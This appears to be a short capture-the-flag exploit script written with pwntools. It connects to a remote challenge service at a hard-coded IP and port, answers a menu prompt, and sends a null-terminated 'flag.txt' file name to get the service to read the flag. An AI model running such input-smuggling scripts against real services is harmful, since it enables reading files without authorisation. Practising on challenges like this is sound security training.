#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./challenge", checksec=False)
# r = process()
r = remote("94.72.112.248", 5050)

# funcs
s = lambda a: r.sendlineafter(b"> ", a)
ss = lambda a: r.sendline(a)

# buf
s(b"12")
ss(b"flag.txt\0")

r.interactive()